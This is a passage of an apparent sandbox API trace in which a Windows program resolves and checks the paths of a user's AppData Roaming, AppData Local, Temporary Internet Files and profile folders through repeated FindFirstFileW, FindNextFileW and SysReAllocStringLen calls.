ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0127.897] GetLastError () returned 0x12 [0127.897] FindClose (in: hFindFile=0x1152798 | out: hFindFile=0x1152798) returned 1 [0127.897] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\temporary internet files" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x796e47d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb10c4320, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xb10c4320, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0x1152798 [0127.898] FindNextFileW (in: hFindFile=0x1152798, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x796e47d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb10c4320, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xb10c4320, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0127.898] GetLastError () returned 0x12 [0127.898] FindClose (in: hFindFile=0x1152798 | out: hFindFile=0x1152798) returned 1 [0127.900] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0127.900] SysReAllocStringLen (in: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x4b | out: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0127.900] SysReAllocStringLen (in: pbstr=0x28fdd0*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x4b | out: pbstr=0x28fdd0*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0127.900] SysReAllocStringLen (in: pbstr=0x3370084*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x3370084*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0127.901] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x3373b58 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0127.901] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchLength=0x22 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming") returned 0x22 [0127.901] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming", len=0x22 | out: pbstr=0x337009c*="c:\\users\\keecfmwgj\\appdata\\roaming") returned 1 [0127.901] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.901] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="users", len=0x5 | out: pbstr=0x3330834*="users") returned 1 [0127.901] SysReAllocStringLen (in: pbstr=0x33700d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33700d4*="keecfmwgj") returned 1 [0127.901] SysReAllocStringLen (in: pbstr=0x33700e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x33700e0*="appdata") returned 1 [0127.902] SysReAllocStringLen (in: pbstr=0x33700ec*=0x0, psz="roaming", len=0x7 | out: pbstr=0x33700ec*="roaming") returned 1 [0127.902] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.902] SysReAllocStringLen (in: pbstr=0x28fdc0*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdc0*="c:\\") returned 1 [0127.902] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0127.902] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x114f2c0 [0127.902] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0127.902] GetLastError () returned 0x12 [0127.902] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.903] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0127.903] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdc0*="c:\\Users\\") returned 1 [0127.903] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0127.903] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x114f2c0 [0127.903] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0127.903] GetLastError () returned 0x12 [0127.904] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.904] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0127.904] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\") returned 1 [0127.904] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0127.904] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x114f2c0 [0127.905] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0127.905] GetLastError () returned 0x12 [0127.905] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.905] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0127.905] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0127.905] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="roaming", len=0x7 | out: pbstr=0x28fae8*="roaming") returned 1 [0127.906] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\roaming" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0x114f2c0 [0127.906] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0127.906] GetLastError () returned 0x12 [0127.906] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.906] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0127.906] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0127.907] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0127.908] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0127.908] SysReAllocStringLen (in: pbstr=0x28fdc4*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fdc4*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0127.908] SysReAllocStringLen (in: pbstr=0x3370088*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x3370088*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0127.908] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x3373b58 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0127.912] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local", cchLength=0x20 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local") returned 0x20 [0127.912] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local", len=0x20 | out: pbstr=0x337009c*="c:\\users\\keecfmwgj\\appdata\\local") returned 1 [0127.912] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.913] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="users", len=0x5 | out: pbstr=0x3330834*="users") returned 1 [0127.913] SysReAllocStringLen (in: pbstr=0x33700d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33700d4*="keecfmwgj") returned 1 [0127.913] SysReAllocStringLen (in: pbstr=0x33700e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x33700e0*="appdata") returned 1 [0127.914] SysReAllocStringLen (in: pbstr=0x33700ec*=0x0, psz="local", len=0x5 | out: pbstr=0x33700ec*="local") returned 1 [0127.914] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.914] SysReAllocStringLen (in: pbstr=0x28fdb4*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdb4*="c:\\") returned 1 [0127.914] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0127.914] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x114f2c0 [0127.915] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0127.915] GetLastError () returned 0x12 [0127.915] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.915] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0127.915] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdb4*="c:\\Users\\") returned 1 [0127.915] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0127.916] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x114f2c0 [0127.916] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0127.916] GetLastError () returned 0x12 [0127.916] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.916] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0127.916] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\") returned 1 [0127.917] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0127.917] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x114f2c0 [0127.917] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0127.917] GetLastError () returned 0x12 [0127.917] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.917] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0127.918] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0127.918] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0127.918] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x114f2c0 [0127.918] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0127.918] GetLastError () returned 0x12 [0127.918] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.919] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0127.919] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0127.921] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0127.921] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0127.921] SysReAllocStringLen (in: pbstr=0x28fdb8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fdb8*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0127.922] SysReAllocStringLen (in: pbstr=0x337008c*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x337008c*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0127.922] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3373b58 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0127.925] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj", cchLength=0x12 | out: lpsz="c:\\users\\keecfmwgj") returned 0x12 [0127.925] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\users\\keecfmwgj", len=0x12 | out: pbstr=0x337009c*="c:\\users\\keecfmwgj") returned 1 [0127.926] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.926] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="users", len=0x5 | out: pbstr=0x3330834*="users") returned 1 [0127.927] SysReAllocStringLen (in: pbstr=0x33700d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33700d4*="keecfmwgj") returned 1 [0127.927] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.927] SysReAllocStringLen (in: pbstr=0x28fda8*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fda8*="c:\\") returned 1 [0127.927] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0127.927] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x114f2c0 [0127.927] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0127.927] GetLastError () returned 0x12 [0127.928] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.928] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0127.928] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fda8*="c:\\Users\\") returned 1 [0127.928] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0127.928] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x114f2c0 [0127.929] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, 